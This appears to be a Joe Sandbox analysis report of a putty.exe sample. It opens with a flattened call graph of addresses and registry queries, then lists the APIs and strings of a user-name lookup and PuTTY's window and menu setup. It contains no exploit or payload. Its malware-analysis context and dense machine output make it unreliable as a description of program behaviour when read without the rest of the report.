56905->56906 56907 4108b6 56906->56907 56908 40e8a8 39 API calls 56907->56908 56910 4108c8 56908->56910 56909->56903 56909->56904 56909->56905 57089 4024f4 56909->57089 56912 40e8a8 39 API calls 56910->56912 56913 4108db 56912->56913 56914 40e7e9 40 API calls 56913->56914 56915 4108ea 56914->56915 56916 40e8a8 39 API calls 56915->56916 56917 4108ff 56916->56917 56918 40e8a8 39 API calls 56917->56918 56919 41090f 56918->56919 56920 40e8a8 39 API calls 56919->56920 56921 41091e 56920->56921 56922 40e8a8 39 API calls 56921->56922 56923 41092d 56922->56923 56924 40e8a8 39 API calls 56923->56924 56925 410940 56924->56925 56926 40e8a8 39 API calls 56925->56926 56927 
410950 56926->56927 56928 40e8a8 39 API calls 56927->56928 56929 41095f 56928->56929 56930 40e8a8 39 API calls 56929->56930 56931 41096f 56930->56931 56932 40e8a8 39 API calls 56931->56932 56933 410981 56932->56933 56934 40e8a8 39 API calls 56933->56934 56935 410993 56934->56935 56936 40e7e9 40 API calls 56935->56936 56937 4109a5 56936->56937 56938 40e8a8 39 API calls 56937->56938 56939 4109b8 56938->56939 56940 40e84f 40 API calls 56939->56940 56941 4109cc 56940->56941 56942 40e8a8 39 API calls 56941->56942 56943 4109de 56942->56943 56944 40e8a8 39 API calls 56943->56944 56945 4109f0 56944->56945 56946 40e8ca 40 API calls 56945->56946 56947 410a01 56946->56947 56948 40e889 RegQueryValueExA 56947->56948 56949 410a10 56948->56949 56950 40248b 38 API calls 56949->56950 56951 410a21 56950->56951 56952 40e889 RegQueryValueExA 56951->56952 56953 410a2d 56952->56953 56954 40248b 38 API calls 56953->56954 56955 410a3e 56954->56955 56956 40e889 RegQueryValueExA 56955->56956 56957 410a4a 56956->56957 56958 40248b 38 API calls 56957->56958 56959 410a5b 56958->56959 56960 40e889 RegQueryValueExA 56959->56960 56961 410a6a 56960->56961 56962 40248b 38 API calls 56961->56962 56963 410a7b 56962->56963 56964 40e889 RegQueryValueExA 56963->56964 56965 410a87 56964->56965 56966 40248b 38 API calls 56965->56966 56967 410a9c 56966->56967 56968 410ac6 56967->56968 56970 40e889 RegQueryValueExA 56967->56970 56969 40e889 RegQueryValueExA 56968->56969 56971 410ad5 56969->56971 56972 410ab2 56970->56972 56973 40248b 38 API calls 56971->56973 56972->56968 56975 40248b 38 API calls 56972->56975 56974 410ae6 56973->56974 56976 40e889 RegQueryValueExA 56974->56976 56975->56968 56977 410af2 56976->56977 56978 40248b 38 API calls 56977->56978 56979 410b03 56978->56979 56980 40e889 RegQueryValueExA 56979->56980 56981 410b0f 56980->56981 56982 40248b 38 API calls 56981->56982 56983 410b20 56982->56983 56984 40e889 RegQueryValueExA 56983->56984 56985 410b2f 56984->56985 56986 40248b 38 API calls 
56985->56986 56987 410b40 56986->56987 56988 40e889 RegQueryValueExA 56987->56988 56989 410b4c 56988->56989 56990 40248b 38 API calls 56989->56990 56991 410b5d 56990->56991 56992 40e889 RegQueryValueExA 56991->56992 56993 410b69 56992->56993 56994 40248b 38 API calls 56993->56994 56995 410b7a 56994->56995 56996 40248b 38 API calls 56995->56996 56997 410b89 56996->56997 56998 40e8a8 39 API calls 56997->56998 56999 410b9c 56998->56999 57000 40e8a8 39 API calls 56999->57000 57001 410baf 57000->57001 57002 40e8a8 39 API calls 57001->57002 57003 410bc1 57002->57003 57004 40e8a8 39 API calls 57003->57004 57005 410bd6 57004->57005 57006 40e815 41 API calls 57005->57006 57007 410be7 57006->57007 57008 40e815 41 API calls 57007->57008 57009 410bf8 57008->57009 57010 40e815 41 API calls 57009->57010 57011 410c09 57010->57011 57012 40e8a8 39 API calls 57011->57012 57013 410c1f 57012->57013 57014 40e7e9 40 API calls 57013->57014 57015 410c2e 57014->57015 57016 40e8a8 39 API calls 57015->57016 57017 410c41 57016->57017 57018 40e8a8 39 API calls 57017->57018 57019 410c51 57018->57019 57020 40e8a8 39 API calls 57019->57020 57021 410c64 57020->57021 57022 40e8a8 39 API calls 57021->57022 57023 410c73 57022->57023 57024 40e8a8 39 API calls 57023->57024 57025 410c83 57024->57025 57026 40e7e9 40 API calls 57025->57026 57027 410c95 57026->57027 57028 449741 RegCloseKey 57027->57028 57028->56461 57029->56463 57030->56467 57032 40e7b4 2 API calls 57031->57032 57033 40e7fb 57032->57033 57034 402564 38 API calls 57033->57034 57035 40e809 57034->57035 57035->56628 57100 4499d8 57036->57100 57038 40e85e 57103 4026cd 57038->57103 57040 40e87d 57040->56630 57042 40e889 RegQueryValueExA 57041->57042 57043 40e8b9 57042->57043 57044 40248b 38 API calls 57043->57044 57045 40e8c5 57044->57045 57045->56633 57047 4497cc 2 API calls 57046->57047 57048 40e7c2 57047->57048 57048->56642 57050 40e896 57049->57050 57121 44983f 57050->57121 57124 4022f4 57053->57124 57055 40e901 57056 40e7b4 2 API calls 
57055->57056 57061 40e90d 57056->57061 57058 40e8dd 57058->57055 57059 4022f4 38 API calls 57058->57059 57134 40264f 38 API calls _wctomb_s 57058->57134 57059->57058 57060 40e916 57060->56676 57061->57060 57062 4025d3 38 API calls 57061->57062 57062->57061 57064 40e7b4 2 API calls 57063->57064 57066 40eb72 _wctomb_s 57064->57066 57065 40ec0e 57067 40ed1f 57065->57067 57070 40ec3a 57065->57070 57071 4020b5 38 API calls 57065->57071 57072 4024f4 38 API calls 57065->57072 57066->57065 57069 4024f4 38 API calls 57066->57069 57067->56727 57068 44c558 38 API calls _wctomb_s 57068->57070 57069->57066 57070->57065 57070->57068 57071->57065 57072->57065 57137 449883 57073->57137 57075 40e824 57146 40273c 57075->57146 57077 40e843 57077->56872 57079 4025df 57078->57079 57080 4025f6 57079->57080 57081 402609 57079->57081 57159 44c558 38 API calls 6 library calls 57080->57159 57083 402606 57081->57083 57086 402626 57081->57086 57083->57081 57160 44c558 38 API calls 6 library calls 57083->57160 57085 402623 57085->57086 57087 401f16 38 API calls 57086->57087 57088 40264b 57087->57088 57088->56676 57090 402500 57089->57090 57091 402517 57090->57091 57092 40252a 57090->57092 57161 44c558 38 API calls 6 library calls 57091->57161 57094 402527 57092->57094 57095 402547 57092->57095 57094->57092 57162 44c558 38 API calls 6 library calls 57094->57162 57097 401f16 38 API calls 57095->57097 57099 402560 57097->57099 57098 402544 57098->57095 57099->56909 57114 4497cc 57100->57114 57102 4499e6 57102->57038 57104 4026d9 57103->57104 57105 4026f0 57104->57105 57106 402703 57104->57106 57119 44c558 38 API calls 6 library calls 57105->57119 57108 402720 57106->57108 57109 402700 57106->57109 57112 401f16 38 API calls 57108->57112 57109->57106 57120 44c558 38 API calls 6 library calls 57109->57120 57111 40271d 57111->57108 57113 402738 57112->57113 57113->57040 57115 4497dc RegQueryValueExA 57114->57115 57116 4497d8 57114->57116 57115->57116 57117 4497fb 57115->57117 57116->57102 
57117->57116 57118 44980d RegQueryValueExA 57117->57118 57118->57116 57119->57109 57120->57111 57122 449851 RegQueryValueExA 57121->57122 57123 40e8a4 57121->57123 57122->57123 57123->56655 57125 402320 57124->57125 57126 40230d 57124->57126 57128 40231d 57125->57128 57129 40233d 57125->57129 57135 44c558 38 API calls 6 library calls 57126->57135 57128->57125 57136 44c558 38 API calls 6 library calls 57128->57136 57130 437cca _wctomb_s 38 API calls 57129->57130 57133 40235d _wctomb_s 57130->57133 57132 40233a 57132->57129 57133->57058 57134->57058 57135->57128 57136->57132 57138 4497cc 2 API calls 57137->57138 57139 449898 57138->57139 57140 44983f RegQueryValueExA 57139->57140 57142 4498d4 57139->57142 57141 4498c1 57140->57141 57141->57142 57143 44983f RegQueryValueExA 57141->57143 57142->57075 57144 4498f0 57143->57144 57144->57142 57145 44983f RegQueryValueExA 57144->57145 57145->57142 57147 402748 57146->57147 57148 402772 57147->57148 57149 40275f 57147->57149 57151 40276f 57148->57151 57152 40278f 57148->57152 57157 44c558 38 API calls 6 library calls 57149->57157 57151->57148 57158 44c558 38 API calls 6 library calls 57151->57158 57155 401f16 38 API calls 57152->57155 57154 40278c 57154->57152 57156 4027a7 57155->57156 57156->57077 57157->57151 57158->57154 57159->57083 57160->57085 57161->57094 57162->57098 57903 407bbd 57163->57903 57165 4045d9 ___initmbctable 57909 407acb 57165->57909 57167 404604 57913 407ca8 57167->57913 57169 40461b 57920 407e9d 57169->57920 57171 40465b 57172 407e9d 13 API calls 57171->57172 57173 404695 57172->57173 57174 40b852 35 API calls 57173->57174 57175 4046b5 57174->57175 57923 407a30 57175->57923 57177 4046c5 57183 4048f7 57177->57183 57927 407c24 57177->57927 57180 407acb 13 API calls 57181 4046fc 57180->57181 57182 407ca8 41 API calls 57181->57182 57187 40470c 57182->57187 57184 407e9d 13 API calls 57183->57184 57188 4049ae 57184->57188 57185 4049e6 57186 407ca8 41 API calls 57185->57186 57189 404a00 57186->57189 57930 
407d26 57187->57930 57188->57185 57192 407e9d 13 API calls 57188->57192 57191 407acb 13 API calls 57189->57191 57197 404a11 57191->57197 57192->57185 57193 404741 57194 407d26 13 API calls 57193->57194 57195 40477f 57194->57195 57196 407ca8 41 API calls 57195->57196 57198 404795 57196->57198 57199 407dcb 13 API calls 57197->57199 57204 4047a8 57198->57204 57207 404905 57198->57207 57200 404a68 57199->57200 57201 407a30 13 API calls 57200->57201 57202 404a79 57201->57202 57203 407acb 13 API calls 57202->57203 57214 404a89 57203->57214 57933 407dcb 57204->57933 57206 404803 57208 407acb 13 API calls 57206->57208 57209 407dcb 13 API calls 57207->57209 57210 40481c 57208->57210 57209->57183 57211 407ca8 41 API calls 57210->57211 57212 40482c 57211->57212 57213 410ce3 16 API calls 57212->57213 57216 404836 57213->57216 57215 407dcb 13 API calls 57214->57215 57218 404b20 57215->57218 57217 407d26 13 API calls 57216->57217 57219 40486b 57217->57219 57936 407fef 57218->57936 57220 407ca8 41 API calls 57219->57220 57221 40487c 57220->57221 57224 407ca8 41 API calls 57221->57224 57223 404b54 57939 40809a 57223->57939 57226 40488b 57224->57226 57227 407ee2 13 API calls 57226->57227 57228 4048b1 57227->57228 57228->57183 57230 407e9d 13 API calls 57228->57230 57229 404b69 57231 407dcb 13 API calls 57229->57231 57230->57183 57232 404bc0 57231->57232 57942 4080c2 57232->57942 57234 404bfd 57237 407a30 13 API calls 57234->57237 57235 407acb 13 API calls 57240 404c45 57235->57240 57236 404bed 57236->57234 57236->57235 57238 404cac 57237->57238 57239 407acb 13 API calls 57238->57239 57242 404cc1 57239->57242 57241 4080c2 13 API calls 57240->57241 57244 404c71 57241->57244 57243 4080c2 13 API calls 57242->57243 57246 404ced 57243->57246 57245 4080c2 13 API calls 57244->57245 57245->57234 57247 4080c2 13 API calls 57246->57247 57248 404d15 57247->57248 57249 4080c2 13 API calls 57248->57249 57250 404d3d 57249->57250 57251 4080c2 13 API calls 57250->57251 57252 404d68 57251->57252 
57253 4080c2 13 API calls 57252->57253 57254 404d90 57253->57254 57255 4080c2 13 API calls 57254->57255 57256 404db8 57255->57256 57257 407d26 13 API calls 57256->57257 57258 404dee 57257->57258 57259 407acb 13 API calls 57258->57259 57260 404e03 57259->57260 57261 407dcb 13 API calls 57260->57261 57262 404e5f 57261->57262 57263 407dcb 13 API calls 57262->57263 57264 404eb7 57263->57264 57265 407acb 13 API calls 57264->57265 57266 404ecc 57265->57266 57945 407d77 57266->57945 57268 404f06 57269 407a30 13 API calls 57268->57269 57270 404f16 57269->57270 57271 407acb 13 API calls 57270->57271 57272 404f2b 57271->57272 57273 407dcb 13 API calls 57272->57273 57274 404f79 57273->57274 57275 407dcb 13 API calls 57274->57275 57276 404fc3 57275->57276 57277 407dcb 13 API calls 57276->57277 57278 405045 57277->57278 57279 407acb 13 API calls 57278->57279 57280 40505a 57279->57280 57281 407dcb 13 API calls 57280->57281 57282 4050a8 57281->57282 57283 407dcb 13 API calls 57282->57283 57284 4050ff 57283->57284 57285 407a30 13 API calls 57284->57285 57286 40510f 57285->57286 57287 407acb 13 API calls 57286->57287 57288 405127 57287->57288 57289 407dcb 13 API calls 57288->57289 57290 405182 57289->57290 57291 407acb 13 API calls 57290->57291 57292 405197 57291->57292 57293 4080c2 13 API calls 57292->57293 57294 4051c4 57293->57294 57295 407d26 13 API calls 57294->57295 57296 4051fb 57295->57296 57297 407d26 13 API calls 57296->57297 57298 405235 57297->57298 57299 40809a 13 API calls 57298->57299 57300 40524e 57299->57300 57301 407d26 13 API calls 57300->57301 57302 405288 57301->57302 57303 407a30 13 API calls 57302->57303 57304 405298 57303->57304 57305 407acb 13 API calls 57304->57305 57306 4052a9 57305->57306 57307 4080c2 13 API calls 57306->57307 57308 4052d5 57307->57308 57309 4080c2 13 API calls 57308->57309 57310 4052fd 57309->57310 57311 4080c2 13 API calls 57310->57311 57312 405325 57311->57312 57313 4080c2 13 API calls 57312->57313 57314 40534d 57313->57314 57315 
4080c2 13 API calls 57314->57315 57316 405375 57315->57316 57317 4080c2 13 API calls 57316->57317 57318 40539d 57317->57318 57319 407dcb 13 API calls 57318->57319 57320 4053f5 57319->57320 57321 4080c2 13 API calls 57320->57321 57322 40541d 57321->57322 57323 4080c2 13 API calls 57322->57323 57324 405445 57323->57324 57325 4080c2 13 API calls 57324->57325 57326 40546d 57325->57326 57327 4080c2 13 API calls 57326->57327 57328 405495 57327->57328 57329 40b852 35 API calls 57328->57329 57330 4054a5 57329->57330 57331 407a30 13 API calls 57330->57331 57332 4054b5 57331->57332 57333 407acb 13 API calls 57332->57333 57334 4054d3 57333->57334 57335 407ca8 41 API calls 57334->57335 57336 4054e6 57335->57336 57337 407d26 13 API calls 57336->57337 57338 40551d 57337->57338 57339 407d26 13 API calls 57338->57339 57340 405557 57339->57340 57341 407ca8 41 API calls 57340->57341 57342 405566 57341->57342 57343 407acb 13 API calls 57342->57343 57344 40557b 57343->57344 57345 407d26 13 API calls 57344->57345 57346 4055b6 57345->57346 57347 4080c2 13 API calls 57346->57347 57348 4055de 57347->57348 57349 4080c2 13 API calls 57348->57349 57350 405606 57349->57350 57351 4080c2 13 API calls 57350->57351 57352 40562e 57351->57352 57353 4080c2 13 API calls 57352->57353 57354 405656 57353->57354 57355 40b852 35 API calls 57354->57355 57356 405666 57355->57356 57357 407a30 13 API calls 57356->57357 57358 405676 57357->57358 57359 407acb 13 API calls 57358->57359 57360 405694 57359->57360 57361 407dcb 13 API calls 57360->57361 57362 4056f5 57361->57362 57363 4080c2 13 API calls 57362->57363 57364 40571d 57363->57364 57365 407acb 13 API calls 57364->57365 57366 405732 57365->57366 57948 408041 57366->57948 57368 405762 57369 407acb 13 API calls 57368->57369 57370 405777 57369->57370 57371 4080c2 13 API calls 57370->57371 57372 4057a3 57371->57372 57373 407acb 13 API calls 57372->57373 57374 4057b8 57373->57374 57375 407d26 13 API calls 57374->57375 57376 4057f3 57375->57376 57377 40b852 35 
API calls 57376->57377 57378 405803 57377->57378 57379 407a30 13 API calls 57378->57379 57380 405813 57379->57380 57381 407acb 13 API calls 57380->57381 57382 405831 57381->57382 57383 407d26 13 API calls 57382->57383 57384 40586c 57383->57384 57385 4080c2 13 API calls 57384->57385 57386 405897 57385->57386 57387 407acb 13 API calls 57386->57387 57388 4058a8 57387->57388 57389 4080c2 13 API calls 57388->57389 57390 4058d4 57389->57390 57391 407a30 13 API calls 57390->57391 57392 4058e4 57391->57392 57393 407acb 13 API calls 57392->57393 57394 4058f9 57393->57394 57395 407d77 13 API calls 57394->57395 57396 405932 57395->57396 57397 407acb 13 API calls 57396->57397 57398 405943 57397->57398 57399 4080c2 13 API calls 57398->57399 57400 405972 57399->57400 57401 40b852 35 API calls 57400->57401 57402 405982 57401->57402 57403 407acb 13 API calls 57402->57403 57404 405997 57403->57404 57405 407dcb 13 API calls 57404->57405 57406 4059f5 57405->57406 57407 4080c2 13 API calls 57406->57407 57408 405a20 57407->57408 57409 407a30 13 API calls 57408->57409 57410 405a30 57409->57410 57411 407acb 13 API calls 57410->57411 57412 405a45 57411->57412 57413 4080c2 13 API calls 57412->57413 57414 405a74 57413->57414 57415 407dcb 13 API calls 57414->57415 57416 405ac4 57415->57416 57417 407acb 13 API calls 57416->57417 57418 405ad9 57417->57418 57419 407c24 13 API calls 57418->57419 57420 405ae8 57419->57420 57951 407ee2 57420->57951 57422 405b17 57423 407ca8 41 API calls 57422->57423 57424 405b76 57423->57424 57425 407d26 13 API calls 57424->57425 57426 405bae 57425->57426 57427 407e9d 13 API calls 57426->57427 57428 405be3 57427->57428 57429 407ca8 41 API calls 57428->57429 57430 405bf9 57429->57430 57431 407a30 13 API calls 57430->57431 57432 405c09 57431->57432 57433 407acb 13 API calls 57432->57433 57434 405c1e 57433->57434 57435 4080c2 13 API calls 57434->57435 57436 405c4b 57435->57436 57437 4080c2 13 API calls 57436->57437 57438 405c76 57437->57438 57439 407dcb 13 API calls 
57438->57439 57440 405cd2 57439->57440 57441 40b852 35 API calls 57440->57441 57442 405ce2 57441->57442 57443 407acb 13 API calls 57442->57443 57444 405cfa 57443->57444 57445 40809a 13 API calls 57444->57445 57446 405d20 57445->57446 57447 407ca8 41 API calls 57446->57447 57448 405d2f 57447->57448 57449 407c24 13 API calls 57448->57449 57450 405d37 57449->57450 57451 407ee2 13 API calls 57450->57451 57452 405d66 57451->57452 57453 40809a 13 API calls 57452->57453 57454 405d91 57453->57454 57455 407d26 13 API calls 57454->57455 57456 405dcc 57455->57456 57457 407d26 13 API calls 57456->57457 57458 405e0e 57457->57458 57459 407d26 13 API calls 57458->57459 57460 405e50 57459->57460 57461 407e9d 13 API calls 57460->57461 57462 405e85 57461->57462 57463 407ca8 41 API calls 57462->57463 57464 405e9b 57463->57464 57465 407a30 13 API calls 57464->57465 57720 406316 57464->57720 57467 405eb8 57465->57467 57466 4065e8 57468 406712 57466->57468 57471 407a30 13 API calls 57466->57471 57470 407acb 13 API calls 57467->57470 57474 407a30 13 API calls 57468->57474 57479 40677a 57468->57479 57469 407a30 13 API calls 57472 406375 57469->57472 57483 405ecd 57470->57483 57475 406607 57471->57475 57473 407acb 13 API calls 57472->57473 57505 406386 57473->57505 57476 40672b 57474->57476 57477 407acb 13 API calls 57475->57477 57480 407acb 13 API calls 57476->57480 57499 40661c 57477->57499 57478 407610 57478->56474 57479->57478 57481 407a30 13 API calls 57479->57481 57496 406740 57480->57496 57482 4067ae 57481->57482 57484 4067f3 57482->57484 57485 4067b7 57482->57485 57487 407d26 13 API calls 57483->57487 57490 407acb 13 API calls 57484->57490 57488 4067c1 57485->57488 57489 406883 57485->57489 57486 4066c1 57494 4080c2 13 API calls 57486->57494 57491 405f08 57487->57491 57493 407acb 13 API calls 57488->57493 57492 407acb 13 API calls 57489->57492 57506 406808 57490->57506 57491->57466 57497 407acb 13 API calls 57491->57497 57500 40689b 57492->57500 57495 4067d2 57493->57495 57503 
4066ea 57494->57503 57502 40809a 13 API calls 57495->57502 57498 407d26 13 API calls 57496->57498 57507 405f2a 57497->57507 57498->57479 57499->57486 57501 407dcb 13 API calls 57499->57501 57508 4080c2 13 API calls 57500->57508 57526 406677 57501->57526 57504 4067eb 57502->57504 57509 4080c2 13 API calls 57503->57509 57511 40695a 57504->57511 57515 407acb 13 API calls 57504->57515 57512 407dcb 13 API calls 57505->57512 57510 407d26 13 API calls 57506->57510 57514 4080c2 13 API calls 57507->57514 57508->57504 57509->57468 57513 406842 57510->57513 57516 406ae4 57511->57516 57520 407acb 13 API calls 57511->57520 57517 4063fe 57512->57517 57518 407acb 13 API calls 57513->57518 57529 405f56 57514->57529 57545 4068e9 57515->57545 57519 407120 57516->57519 57523 407a30 13 API calls 57516->57523 57521 407ca8 41 API calls 57517->57521 57531 406857 57518->57531 57522 407a30 13 API calls 57519->57522 57530 40697e 57520->57530 57540 40640d 57521->57540 57525 407133 57522->57525 57524 406b01 57523->57524 57527 407acb 13 API calls 57524->57527 57528 407acb 13 API calls 57525->57528 57533 407dcb 13 API calls 57526->57533 57538 406b12 57527->57538 57539 407148 57528->57539 57532 4080c2 13 API calls 57529->57532 57968 407f91 13 API calls 57530->57968 57536 4080c2 13 API calls 57531->57536 57534 405f7e 57532->57534 57533->57486 57537 407acb 13 API calls 57534->57537 57536->57489 57560 405f93 57537->57560 57541 4080c2 13 API calls 57538->57541 57543 4080c2 13 API calls 57539->57543 57542 407d26 13 API calls 57540->57542 57548 406b3e 57541->57548 57554 406444 57542->57554 57550 407177 57543->57550 57544 4069ad 57546 4080c2 13 API calls 57544->57546 57547 407dcb 13 API calls 57545->57547 57549 4069dc 57546->57549 57547->57511 57552 4080c2 13 API calls 57548->57552 57549->57516 57553 407a30 13 API calls 57549->57553 57551 4080c2 13 API calls 57550->57551 57555 4071a3 57551->57555 57556 406b66 57552->57556 57557 4069f9 57553->57557 57558 407d26 13 API calls 57554->57558 57559 407ca8 41 

                            Control-flow Graph

                            APIs
                            • GetProcAddress.KERNELBASE(00000000,GetUserNameExA), ref: 00446783
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 00446802
                            • GetUserNameA.ADVAPI32(00000000,?), ref: 00446822
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: NameUser$AddressProc
                            • String ID: GetUserNameExA$secur32.dll
                            • API String ID: 9235790-1467407615
                            • Opcode ID: 1ca44e35f902d35c238435ac5a6744272573cb08aeb1073fe096aa8417d1272b
                            • Instruction ID: 51b71fb90d7319dcf99ef60c9596c9b22611e8f2946cd3f1b10b4fbae7343758
                            • Opcode Fuzzy Hash: 1ca44e35f902d35c238435ac5a6744272573cb08aeb1073fe096aa8417d1272b
                            • Instruction Fuzzy Hash: 2021DBB2501214BEEB14AF659DC1E7F77E8D741718F22003FF600E6281DA795D84976E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • #17.COMCTL32 ref: 0044421E
                              • Part of subcall function 0043CEAE: CreateDialogParamA.USER32(0000006F,00000000,Function_0003C7F4,00000000), ref: 0043CEC0
                              • Part of subcall function 0043CEAE: ShowWindow.USER32(00000000,00000000), ref: 0043CECB
                              • Part of subcall function 0043CEAE: SetActiveWindow.USER32(00000000), ref: 0043CED2
                              • Part of subcall function 0043CEAE: KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043CED9
                              • Part of subcall function 00446489: GetVersionExA.KERNEL32(00477440), ref: 004464AA
                            • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 0044426D
                            • GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 00444292
                            • CoInitialize.OLE32 ref: 004442B0
                            • MessageBoxA.USER32(?,Failed to initialize COM subsystem,00000000,00000030), ref: 004442DC
                            • _strlen.LIBCMT ref: 0044437D
                            • _strspn.LIBCMT ref: 00444449
                            • _strrchr.LIBCMT ref: 0044445D
                            • MapViewOfFile.KERNEL32(?,00000004,?,?,?), ref: 004444D9
                            • UnmapViewOfFile.KERNEL32(00000000,?,?,?), ref: 004444FC
                            • CloseHandle.KERNEL32(?,?,?,?), ref: 00444505
                            • LoadIconA.USER32(?,000000C8), ref: 004447FD
                            • LoadCursorA.USER32(?,00007F01), ref: 0044480C
                            • RegisterClassA.USER32(PuTTY), ref: 00444827
                            • CreateWindowExA.USER32(?,PuTTY,PuTTY,?,80000000,80000000,-00474DC0,?,?,?,?), ref: 0044495A
                            • GetWindowRect.USER32(?), ref: 004449E4
                            • GetClientRect.USER32(?), ref: 004449F4
                            • SetWindowPos.USER32(?,?,?,?,?,0000000E), ref: 00444A6E
                            • CreateBitmap.GDI32(00000001,00000001,00000000), ref: 00444AB3
                            • CreateCaret.USER32(?,?,?,?), ref: 00444ADD
                            • SetScrollInfo.USER32(00000001,0000001C), ref: 00444B19
                            • GetDoubleClickTime.USER32(?,?,?,?,?,?,0000000E), ref: 00444B2B
                            • GetSystemMenu.USER32(?,?,?,?,?,?,?,0000000E), ref: 00444B3D
                            • CreatePopupMenu.USER32 ref: 00444B48
                            • AppendMenuA.USER32(00000000,?,00000190,&Paste), ref: 00444B65
                            • CreateMenu.USER32 ref: 00444B67
                            • AppendMenuA.USER32(?,00000800), ref: 00444B9D
                            • AppendMenuA.USER32(?,?,00000010,&Event Log), ref: 00444BAA
                            • AppendMenuA.USER32(?,00000800), ref: 00444BB2
                            • AppendMenuA.USER32(?,?,00000020,Ne&w Session...), ref: 00444BBF
                            • AppendMenuA.USER32(?,?,00000030,&Duplicate Session), ref: 00444BCC
                            • AppendMenuA.USER32(?,00000010,Sa&ved Sessions), ref: 00444BDE
                            • AppendMenuA.USER32(?,?,00000050,Chan&ge Settings...), ref: 00444BEB
                            • AppendMenuA.USER32(?,00000800), ref: 00444BF3
                            • AppendMenuA.USER32(?,?,00000170,C&opy All to Clipboard), ref: 00444C03
                            • AppendMenuA.USER32(?,?,00000060,C&lear Scrollback), ref: 00444C10
                            • AppendMenuA.USER32(?,?,00000070,Rese&t Terminal), ref: 00444C1D
                            • AppendMenuA.USER32(?,00000800), ref: 00444C25
                            • AppendMenuA.USER32(?,00000000,&Full Screen), ref: 00444C4A
                            • AppendMenuA.USER32(?,00000800), ref: 00444C52
                            • AppendMenuA.USER32(?,?,00000140,&Help), ref: 00444C6B
                            • AppendMenuA.USER32(?,?,00000150,00000000), ref: 00444C8C
                            • GetKeyboardLayout.USER32 ref: 00444CAB
                            • ShowWindow.USER32(?,?,?,00000150,00000000,?,?,?,?,00000070,Rese&t Terminal,?,00000060,C&lear Scrollback,?,00000170), ref: 00444CC1
                            • SetForegroundWindow.USER32 ref: 00444CCD
                            • GetForegroundWindow.USER32(?,?,00000150,00000000,?,?,?,?,00000070,Rese&t Terminal,?,00000060,C&lear Scrollback,?,00000170,C&opy All to Clipboard), ref: 00444CE4
                            • UpdateWindow.USER32 ref: 00444D09
                            • MsgWaitForMultipleObjects.USER32(?,00000000,?,000000FF,000000FF), ref: 00444D2D
                            • IsWindow.USER32 ref: 00444D62
                            • IsDialogMessageA.USER32(?,?,?,?,00000001,?,000000FF,000000FF,?,00000150,00000000,?,?,?,?,00000070), ref: 00444D76
                            • DispatchMessageA.USER32(?), ref: 00444D84
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C598
                              • Part of subcall function 0044C558: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000002), ref: 0044C5D6
                              • Part of subcall function 0044C558: _strcat.LIBCMT ref: 0044C5EC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C5FC
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C60D
                              • Part of subcall function 0044C558: _strncpy.LIBCMT ref: 0044C628
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C665
                              • Part of subcall function 0044C558: _strlen.LIBCMT ref: 0044C67A
                            • PeekMessageA.USER32(?,?,?,?,00000001), ref: 00444DAC
                            • GetForegroundWindow.USER32(?,?,?,00000001,?,?,00000001,?,000000FF,000000FF,?,00000150,00000000), ref: 00444DB2
                            Strings
                            • MSWHEEL_ROLLMSG, xrefs: 00444268
                            • &Help, xrefs: 00444C5D
                            • -pgpfp, xrefs: 004445B3
                            • This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 0044475E
                            • tE, xrefs: 00444815, 00444950
                            • &About %s, xrefs: 00444C73
                            • Ne&w Session..., xrefs: 00444BB4
                            • ..\windows\window.c, xrefs: 004445FC
                            • Remove saved sessions and random seed file?If you hit Yes, ALL Registry entries associatedwith %s will be removed, as well as therandom seed file. THIS PROCESS WILLDESTROY YOUR SAVED SESSIONS.(This only affects the currently logged-in user.)If you hit , xrefs: 00444747
                            • &Duplicate Session, xrefs: 00444BC1
                            • %s Warning, xrefs: 0044476E
                            • Chan&ge Settings..., xrefs: 00444BE0
                            • option "%s" requires an argument, xrefs: 00444566
                            • Rese&t Terminal, xrefs: 00444C12
                            • &Paste, xrefs: 00444B54
                            • telnet:, xrefs: 00444615
                            • C&lear Scrollback, xrefs: 00444C05
                            • Sa&ved Sessions, xrefs: 00444BCE
                            • Failed to initialize COM subsystem, xrefs: 004442D6
                            • %s Fatal Error, xrefs: 00444238, 004442C5
                            • &Event Log, xrefs: 00444B9F
                            • FlashWindowEx, xrefs: 0044428C
                            • %s Uninstallation, xrefs: 00444757
                            • QG, xrefs: 00444833
                            • -cleanup-during-uninstall, xrefs: 0044459E, 00444730
                            • ret == 2, xrefs: 00444601
                            • PuTTY, xrefs: 00444820, 00444955, 00444956
                            • user32.dll, xrefs: 0044427D
                            • -cleanup, xrefs: 00444589
                            • &Full Screen, xrefs: 00444C27
                            • C&opy All to Clipboard, xrefs: 00444BF5
                            • %p:%u, xrefs: 004444B7
                            • unknown option "%s", xrefs: 00444704
                            • Windows refuses to report a version, xrefs: 00444249
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
